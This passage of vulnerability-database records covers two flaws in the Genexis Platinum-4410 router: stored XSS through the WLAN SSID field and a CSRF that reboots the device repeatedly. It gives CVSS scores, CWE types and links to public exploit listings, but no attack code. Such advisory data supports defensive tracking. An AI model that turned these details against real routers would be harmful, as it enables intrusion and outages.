"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202010-1001",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum-4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "genexis platinum-4410 firmware p4410-v2-1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": null
},
{
"model": "platinum-4410 p4410-v2-1.28",
"scope": null,
"trust": 0.6,
"vendor": "genexis",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "NVD",
"id": "CVE-2020-27980"
}
]
},
"cve": "CVE-2020-27980",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CVE-2020-27980",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"id": "CNVD-2020-63198",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"id": "CVE-2020-27980",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2020-27980",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-27980",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2020-27980",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-63198",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202010-1598",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
},
{
"db": "NVD",
"id": "CVE-2020-27980"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis Platinum-4410 P4410-V2-1.28 devices allow stored XSS in the WLAN SSID parameter. This could allow an attacker to perform malicious actions in which the XSS popup will affect all privileged users. Genexis Platinum-4410 Contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Genexis Platinum-4410 is a wireless router of British Genexis company. \n\r\n\r\nGenexis Platinum-4410 P4410-V2-1.28 has a cross-site scripting vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-27980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "VULMON",
"id": "CVE-2020-27980"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-27980",
"trust": 3.1
},
{
"db": "EXPLOIT-DB",
"id": "48948",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-63198",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202010-1598",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-27980",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "VULMON",
"id": "CVE-2020-27980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
},
{
"db": "NVD",
"id": "CVE-2020-27980"
}
]
},
"id": "VAR-202010-1001",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
}
],
"trust": 1.3232142850000002
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
}
]
},
"last_update_date": "2024-11-23T22:25:20.749000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Platinum",
"trust": 0.8,
"url": "https://genexis.eu/product/platinum/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "NVD",
"id": "CVE-2020-27980"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.exploit-db.com/exploits/48948"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27980"
},
{
"trust": 1.7,
"url": "https://genexis.eu/product/platinum/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "VULMON",
"id": "CVE-2020-27980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
},
{
"db": "NVD",
"id": "CVE-2020-27980"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "VULMON",
"id": "CVE-2020-27980"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
},
{
"db": "NVD",
"id": "CVE-2020-27980"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-11-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"date": "2020-10-28T00:00:00",
"db": "VULMON",
"id": "CVE-2020-27980"
},
{
"date": "2021-06-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"date": "2020-10-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202010-1598"
},
{
"date": "2020-10-28T19:15:14.107000",
"db": "NVD",
"id": "CVE-2020-27980"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-11-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"date": "2020-11-04T00:00:00",
"db": "VULMON",
"id": "CVE-2020-27980"
},
{
"date": "2021-06-09T07:37:00",
"db": "JVNDB",
"id": "JVNDB-2020-012844"
},
{
"date": "2020-11-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202010-1598"
},
{
"date": "2024-11-21T05:22:08.560000",
"db": "NVD",
"id": "CVE-2020-27980"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis Platinum-4410 cross-site scripting vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63198"
},
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202010-1598"
}
],
"trust": 0.6
}
}
VAR-202111-0723
Vulnerability from variot - Updated: 2024-08-14 14:18Cross site request forgery (CSRF) in Genexis Platinum 4410 V2-1.28, allows attackers to cause a denial of service by continuously restarting the router. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Service operation interruption (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202111-0723",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum 4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "p4410-v2-1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "genexis platinum-4410 firmware 2-1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"db": "NVD",
"id": "CVE-2020-28137"
}
]
},
"cve": "CVE-2020-28137",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2020-28137",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2020-28137",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2020-28137",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-28137",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2020-28137",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202111-1009",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"db": "CNNVD",
"id": "CNNVD-202111-1009"
},
{
"db": "NVD",
"id": "CVE-2020-28137"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross site request forgery (CSRF) in Genexis Platinum 4410 V2-1.28, allows attackers to cause a denial of service by continuously restarting the router. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Service operation interruption (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-28137"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-28137",
"trust": 3.2
},
{
"db": "EXPLOIT-DB",
"id": "48972",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-017478",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202111-1009",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"db": "CNNVD",
"id": "CNNVD-202111-1009"
},
{
"db": "NVD",
"id": "CVE-2020-28137"
}
]
},
"id": "VAR-202111-0723",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.44642857
},
"last_update_date": "2024-08-14T14:18:14.890000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.gxgroup.eu/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.0
},
{
"problemtype": "Cross-site request forgery (CWE-352) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"db": "NVD",
"id": "CVE-2020-28137"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.exploit-db.com/exploits/48972"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28137"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"db": "CNNVD",
"id": "CNNVD-202111-1009"
},
{
"db": "NVD",
"id": "CVE-2020-28137"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"db": "CNNVD",
"id": "CNNVD-202111-1009"
},
{
"db": "NVD",
"id": "CVE-2020-28137"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-10-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"date": "2021-11-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202111-1009"
},
{
"date": "2021-11-10T17:15:07.760000",
"db": "NVD",
"id": "CVE-2020-28137"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-10-31T05:01:00",
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"date": "2021-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202111-1009"
},
{
"date": "2021-11-13T03:58:04.713000",
"db": "NVD",
"id": "CVE-2020-28137"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202111-1009"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis\u00a0Platinum\u00a04410\u00a0 Cross-site request forgery vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202111-1009"
}
],
"trust": 0.6
}
}